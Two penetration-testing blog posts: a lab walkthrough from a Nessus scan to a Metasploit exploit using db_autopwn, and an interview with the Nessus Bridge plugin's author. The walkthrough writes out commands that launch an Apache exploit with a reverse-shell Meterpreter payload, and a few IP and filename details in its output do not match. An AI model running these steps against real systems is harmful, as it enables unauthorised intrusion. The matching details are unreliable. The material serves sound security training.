From Nessus to Metasploit to game over

How many times have you fired off a Nessus scan, found the goodies, and then had to go to ExploitDB or a similar site in search of an exploit? Or, if you are a pro, gone off to write your own exploit for the newly discovered vulnerability?

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juicy vulnerability. If this is the first time you have heard of ExploitDB or Metasploit, you should first visit the Metasploit Unleashed training site.

Lab setup

  • Backtrack 4 Linux VM
  • Windows 2003 server with a vulnerable web app

Below are the steps to get from a Nessus scan to the correct Metasploit module for exploiting your system.

Step one: Install Nessus

You can download your copy of Nessus from the Tenable site (see the references below) and don’t forget to register for a HomeFeed license. Now create your scan policy or use one of the default policies. I selected the web application policy since the target server was running an outdated web application. Once your scan is completed, download the report and save it in the .nessus format.

Step two: Launching Metasploit

Log in to your machine of choice; in my case it’s my BackTrack 4 Linux VM. Issue the following commands to load Metasploit:

  • cd /pentest/exploits/framework3 (change to your Metasploit installation directory)
  • ./msfconsole
  • svn up (to get the latest updates)

Step three: DB Magic

At this stage you will need to create a DB, import the Nessus report you saved, and then perform your hacking kung fu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command searches Metasploit for any exploits whose references match the vulnerabilities in the Nessus report (-x matches by reference, -t only lists the matches); it will not automatically run the exploits unless you add the -e option. In most cases, if you are testing this against a live system, you should leave out the -e option to avoid crashing your server.
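As an added example (not code from the post or from Metasploit), here is a small Python script that reproduces what db_autopwn -t -x does with an imported report: it parses a Nessus XML (v2) report and matches each finding’s CVE references against a table of modules, listing matches without running anything. The report body, plugin IDs and plugin names are constructed sample data; the module names and CVEs are the ones shown in this post’s db_autopwn output.

```python
# Added example, not the post's code: re-implements the reference matching that
# "db_autopwn -t -x" does, over a constructed Nessus XML (v2) report.
import xml.etree.ElementTree as ET
# Constructed .nessus (v2) report; plugin IDs and names are made-up sample data.
NESSUS_XML = """<NessusClientData_v2>
  <Report name="TestSrvr">
    <ReportHost name="10.10.0.19">
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="3"
                  pluginID="99901" pluginName="Apache mod_rewrite LDAP (constructed)">
        <cve>CVE-2006-3747</cve>
        <bid>19204</bid>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="99902" pluginName="SMB weak credentials (constructed)">
        <cve>CVE-1999-0504</cve>
      </ReportItem>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="99903" pluginName="SSH banner (constructed)"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>"""
# Hand-built reference table (module -> CVEs), taken from the post's db_autopwn output.
MODULE_REFS = {
    "exploit/windows/smb/psexec": {"CVE-1999-0504"},
    "exploit/windows/http/apache_mod_rewrite_ldap": {"CVE-2006-3747"},
}

def parse_nessus_v2(xml_text):
    """Return (host, port, cve) tuples for every ReportItem that carries a CVE."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        addr = host.get("name")
        for item in host.iter("ReportItem"):
            for cve in item.findall("cve"):  # items without <cve> are skipped
                findings.append((addr, int(item.get("port")), cve.text.strip()))
    return findings

def match_modules(findings, module_refs=MODULE_REFS):
    """Map (host, port) -> modules whose CVE refs hit a finding; nothing is run."""
    matches = {}
    for addr, port, cve in findings:
        for module, refs in module_refs.items():
            if cve in refs:
                matches.setdefault((addr, port), set()).add(module)
    return matches

if __name__ == "__main__":
    for (addr, port), mods in sorted(match_modules(parse_nessus_v2(NESSUS_XML)).items()):
        print(f"{addr}:{port}  {', '.join(sorted(mods))}")
```

Findings with no CVE reference (the port 22 item) produce no match, which is the same reason a real report can import cleanly and still yield few or no db_autopwn matches.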

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on it’s GAME OVER!

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation


Nessus and Metasploit living in harmony

I had this post queued up for a while but kept holding back, waiting on the new version of Metasploit, 3.5.0-dev; in addition, each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he was working on implementing.

Now on to the reason for this post. Being a fan of both Metasploit and Nessus, I was very happy when I saw a tweet a month or so back mentioning a project that would bring both of these wonderful tools together in a nice, easy-to-use fashion. That project was labeled “Nessus Bridge for Metasploit”. The basic goal behind this project was to “allow you to do various tasks with your Nessus server, from within the msf command line. By that I mean scan with Nessus, review the results, import the results and then exploit the results.” After reading those few lines from the project home page I was already sold.

What can you do with this plug-in or bridge you might ask?

The commands are broken up into the following categories and are covered in detail over at http://blog.zate.org.

A few prerequisites are needed before you can start hacking away:

  • A host with Metasploit installed and configured (I recommend BackTrack 4)
  • A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
  • A vulnerable host to test with (I recommend you download metasploitable)

Brief demo section before I get into the interview:

MSF Console

Nessus Login Interface

  1. First fire up both Metasploit and Nessus and run an update to ensure you have the latest signatures.
  2. Log in to Nessus and create your scanning policy.
  3. Close out your browser and prepare to have some fun CLI style!
    1. Load the Nessus plugin within msfconsole with “load nessus”.
    2. Next connect to your Nessus server with “nessus_connect username:password@host:port ok”.
    3. From this point on you can view all policies, perform a scan, import the results and then use db_autopwn to seal the deal (using nessus_policy_list and nessus_scan_new).
    4. Import scan results with “nessus_report_get <report id>” and then run db_autopwn.

Now on to the Q & A section with the author:

Question: How did you get started on your Infosec journey, and also the blogging sphere?

Answer: I started out as a secure data communication guy for the Australian Army and then left to become a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management. From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me. I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them. I’ve not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about. Always seemed to be something else to do. I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

Everything kind of clicked together and I thought, what if I could stick that library in Metasploit and talk directly to my Nessus server and import the data right into Metasploit. Some awkward talks about licenses later and HDM merged k0st’s library and my basic shell of a plugin. (Big thanks to k0st for his hard work on the library which I used as a starting point.)

Q: What advice would you give a newcomer who would like to start using this bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe. A full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/. Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate). Start with working with all the tools on one box (nessus, msf, database); I find Ubuntu (native or vmware player) the best way to start. Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this bridge?

A: This plugin won’t magically make your Nessus scans more accurate; you still have to tweak/tune them, and honestly right now that is probably best done through the web interface for policy tuning. Don’t expect to scan a class C and have it import easily; big reports are a pain right now (streaming parser coming soon). Ideally the way to use this is scan, examine, import, pwn. It’s not a replacement for knowing about exploits and vulnerabilities; you will still need to do some work :).

Q: Why did you choose Metasploit above other applications/frameworks to incorporate this functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow its end users to join in the fun and submit modifications. It’s one thing to do an RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool. I think the combination of free msf and a free (or cheap) Nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely. Also Ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project, what’s the best approach?

A: Couple of ways. Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploit, fork it, hack it and submit a pull request for me to include your changes. I then submit a diff to msfdev about once a week (or when I have significant changes).

You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github. Why github and not the Metasploit site? Mainly to not annoy the msfdevs. This way I can tweak/hack/commit as often as I need to and not impact their work on msf. I can then just submit working code when I need it included in msf.

A big thank you to Zate a.k.a. MrUrbanity for letting me interview him and, most importantly, for making such a contribution to the community.